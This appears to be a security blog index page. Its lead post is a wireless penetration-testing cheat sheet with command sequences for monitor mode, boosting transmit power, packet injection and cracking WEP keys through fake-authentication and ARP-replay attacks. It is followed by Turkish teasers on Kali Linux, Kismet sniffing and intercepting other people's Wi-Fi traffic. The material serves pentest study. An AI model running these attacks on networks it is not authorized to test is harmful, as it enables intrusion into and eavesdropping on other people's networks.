Network Security

Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
# use wlan0 instead of wlan0mon
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

Driver Install (Kali – Alfa Adapter)

root@uceka:~# sudo apt update
root@uceka:~# sudo apt upgrade -y
root@uceka:~# sudo apt dist-upgrade -y
root@uceka:~# sudo reboot now
root@uceka:~# sudo apt update
root@uceka:~# sudo apt install realtek-rtl88xxau-dkms
root@uceka:~# sudo apt install dkms
root@uceka:~# git clone https://github.com/aircrack-ng/rtl8812au
root@uceka:~# cd rtl8812au/
root@uceka:~# sudo make
root@uceka:~# sudo make install

Scan

root@uceka:~# airodump-ng wlan0mon
# or
root@uceka:~# wifite

WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »

Backtrack 6 Çıktı!

Posted on Updated on

BackTrack Linux’un ilk versiyonu 7 yıl önce yayınlanmıştı… Günümüzde dünyada en yaygın kullanılan Linux dağıtımlarından birisi haline gelen BackTrack; pentest ve güvenlik alanında çalışmalar yapan kişiler için vazgeçilmez bir araç.
BackTrack’ın geliştiricileri yaklaşık olarak bir yıl kadar önce BackTrack 6 hakkında beyin fırtınası yapmaya başlamışlar. En sonunda Kali Linux adında çıkardıkları bu dağıtım, pek çok yenilik barındırmakta… Debian temelli bir dağıtım olan Kali Linux ile Backtrack arasında ne gibi farklar var derseniz eğer; geliştiriciler bu karşılaştırmayı yaparken “çok şey” ve “hiçbir şey” diye ifade ediyorlar. Aslında sizin BackTrack’ı hangi amaçlarda kullandığınız ile ilgili olarak aradaki farklar da değişiyor. Bu dağıtımın en büyük yeniliklerinden birisi de; cep telefonları, tablet ve bazı bilgisayar vb. kullanılan ARM işlemci destekleyen cihazlarda içinde  kullanılabilmesi.
Tamamen ücretsiz olan bu dağıtım 300’den fazla pentest aracı içermekte.Örnek ekran görüntüleri;
Read the rest of this entry »

Android ile Paket Yakalama & Online Analiz

Posted on Updated on

Wireless sniffing konusunda kullanılan en yaygın araçlardan birisi de ‘Kısmet‘tir. Bu tool aracılığı ile bağlı olunan kablosuz ağ üzerinde ki  paket akışları gözlemlenebilir. Kısmet tool’unu yazan arkadaşlar bu olayı biraz daha mobilize ederek bu aracın android versiyonunu da çıkarmışlar. Programa buradan erişebilirsiniz. Programın kullanışına gelirsek;
Read the rest of this entry »

Wireless Network Traffic Capture (Man in the Middle Attack)

Posted on Updated on

Bu yazıda çevrenizde bulunan herhangi bir kablosuz ağ trafiğini üstünüze alarak ağdan geçen bilgileri nasıl dinlenebileceğini anlatmaya çalışacağım. Öncelikle işin mantık kısmını konuşalım… Kablosuz ağını dinlemek istediğimiz kişinin veya kişilerin ağını dinleyebilmek için onlarla aynı ağı paylaşıyor olmamız lazım. Onlarla aynı ağda iseniz zaten bir problem yok… Onlarla aynı ağda değilseniz ve karşı modemin de şifresini bilmiyorsanız yazının bundan sonraki kısmı ilginizi çekebilir… Read the rest of this entry »